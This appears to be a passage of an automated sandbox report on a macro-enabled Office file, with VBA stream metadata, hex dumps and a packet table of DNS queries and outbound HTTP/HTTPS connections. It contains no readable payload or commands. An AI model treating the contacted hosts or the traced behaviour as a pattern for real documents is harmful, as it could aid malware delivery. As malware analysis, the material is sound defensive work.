Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1841

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	1841
Entropy:	3.27138896709
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . ; . . . . . Y O . < . . _ l n q . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 241

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	241
Entropy:	2.2163630714
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d w M i l l i s e c o n d s . . . . . . . . . . . . . . . . s r . . . . . . . . . . . . . . . . e r . . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . . c o d e T . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 04 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 312

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	312
Entropy:	2.24874846392
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . & . . . . . . . . . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 426

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	426
Entropy:	2.04348774696
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . A . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . H . H . H . 8 . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 40 00 41 08 00 00 00 00 00 00 00 00 00 00 00 00 00 70 04 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 620

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	620
Entropy:	6.35206964221
Base64 Encoded:	True
Data ASCII:	. h . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . # H \\ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ s y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 68 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e9 23 48 5c 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2018 09:56:35.684814930 CET	56842	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:36.692917109 CET	56842	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:37.174513102 CET	53	56842	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:37.206469059 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:37.206496000 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:37.206640005 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:37.284881115 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:37.284899950 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:37.867747068 CET	53	56842	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:39.363250971 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:39.363270044 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:39.363277912 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:39.363465071 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:39.714971066 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:39.715240002 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:39.762020111 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:39.762046099 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:42.331273079 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:42.331511974 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:42.810108900 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:42.810151100 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:43.948395014 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:43.948412895 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:43.948441029 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:43.948714018 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:43.950043917 CET	49163	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:56:43.950078011 CET	443	49163	172.217.3.174	192.168.2.2
Mar 1, 2018 09:56:46.234924078 CET	53440	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:47.231744051 CET	53440	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:47.479697943 CET	53	53440	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:48.285332918 CET	59605	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:48.529203892 CET	53	53440	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:49.282732010 CET	59605	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:49.593730927 CET	50900	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:49.750072956 CET	51075	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:50.271864891 CET	53	59605	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:50.744911909 CET	51075	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:50.755230904 CET	53	59605	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.002640963 CET	53	50900	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.194181919 CET	53	51075	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.196635962 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:51.196665049 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:51.196724892 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:51.198149920 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:51.198170900 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:51.513185978 CET	53	51075	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.518181086 CET	50900	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:51.519543886 CET	49166	80	192.168.2.2	170.207.225.82
Mar 1, 2018 09:56:51.519567013 CET	80	49166	170.207.225.82	192.168.2.2
Mar 1, 2018 09:56:51.519623995 CET	49166	80	192.168.2.2	170.207.225.82
Mar 1, 2018 09:56:51.520142078 CET	49166	80	192.168.2.2	170.207.225.82
Mar 1, 2018 09:56:51.520153999 CET	80	49166	170.207.225.82	192.168.2.2
Mar 1, 2018 09:56:52.243382931 CET	53	50900	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:52.243475914 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:52.243495941 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:52.243504047 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:52.243560076 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:52.263655901 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:52.263667107 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:52.799913883 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:52.799952030 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:52.831520081 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:52.831531048 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:53.123893976 CET	49166	80	192.168.2.2	170.207.225.82
Mar 1, 2018 09:56:53.685393095 CET	61674	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:53.841671944 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:53.841695070 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:53.841700077 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:53.841769934 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:54.146728039 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.146800041 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:54.449769020 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.449778080 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.449781895 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.449855089 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:54.742008924 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.742021084 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.742026091 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:54.742100000 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:55.169131994 CET	53	61674	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:55.169187069 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:55.169193983 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:55.169197083 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:55.169260979 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:55.219652891 CET	61674	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:55.326189041 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:55.611012936 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:55.611037970 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:55.611126900 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:56.043442011 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.043457985 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.043466091 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.043581009 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:56.322947025 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:56.471712112 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.471735001 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.471743107 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.471784115 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:56.485788107 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.485873938 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:56.872991085 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.873006105 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.873012066 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:56.873116016 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:57.227112055 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:57.227134943 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:57.227142096 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:57.227449894 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:57.324069977 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:57.743043900 CET	53	61674	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:57.743180037 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:57.744524002 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:58.191575050 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.191601038 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.191613913 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.191695929 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:58.800394058 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:58.800481081 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.800499916 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.800695896 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:58.802177906 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:56:58.802200079 CET	80	49168	67.199.248.11	192.168.2.2
Mar 1, 2018 09:56:58.802433014 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:56:58.803955078 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:56:58.803986073 CET	80	49168	67.199.248.11	192.168.2.2
Mar 1, 2018 09:56:58.813406944 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.813740015 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:58.835299969 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:58.835594893 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:59.264214039 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:59.264305115 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.264317036 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.264324903 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.265171051 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:59.277096987 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.277199030 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:56:59.980142117 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.980159044 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.980165958 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:56:59.980611086 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:00.425441027 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:00.425523043 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:00.425534964 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:00.425657034 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:01.037095070 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.037111044 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.037117004 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.037205935 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:01.481854916 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.481872082 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.481879950 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:01.481935024 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:02.090897083 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.090914011 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.090924025 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.091238022 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:02.541968107 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.541984081 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.541992903 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:02.542047024 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:03.154592037 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:03.154611111 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:03.154726982 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:03.541798115 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:03.541817904 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:03.541825056 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:03.541959047 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:04.066034079 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.066054106 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.066061974 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.066461086 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:04.080786943 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.080910921 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:04.579667091 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.579685926 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.579693079 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:04.579879999 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:05.154783010 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:05.154803991 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:05.154812098 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:05.154896975 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:05.538975000 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:05.538995981 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:05.539510965 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:06.067331076 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.067348003 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.067354918 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.067435026 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:06.416733027 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.418324947 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:06.918879986 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.918900967 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.918912888 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:06.919030905 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:07.242396116 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:07.242415905 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:07.242424011 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:07.242486000 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:07.242837906 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:07.777957916 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:07.777978897 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:07.778351068 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:08.166727066 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:08.166879892 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:08.765176058 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:08.765194893 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:08.765202045 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:08.765424967 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:09.185955048 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.185975075 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.185982943 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.186495066 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:09.706423998 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.706443071 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.706450939 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:09.707214117 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:10.139807940 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:10.139827013 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:10.139834881 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:10.140036106 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:10.153430939 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:10.153587103 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:10.725399017 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:10.725495100 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:11.061445951 CET	80	49168	67.199.248.11	192.168.2.2
Mar 1, 2018 09:57:11.061466932 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.061474085 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.061481953 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.061568975 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:57:11.061594009 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:11.162659883 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:11.587207079 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.587229967 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.587238073 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.587416887 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:11.928359032 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.928378105 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.928385973 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:11.928931952 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:12.156527042 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:12.311799049 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:12.311817884 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:12.311825037 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:12.312232971 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:12.326023102 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:12.326194048 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:12.720922947 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:12.721342087 CET	49165	443	192.168.2.2	172.217.3.164
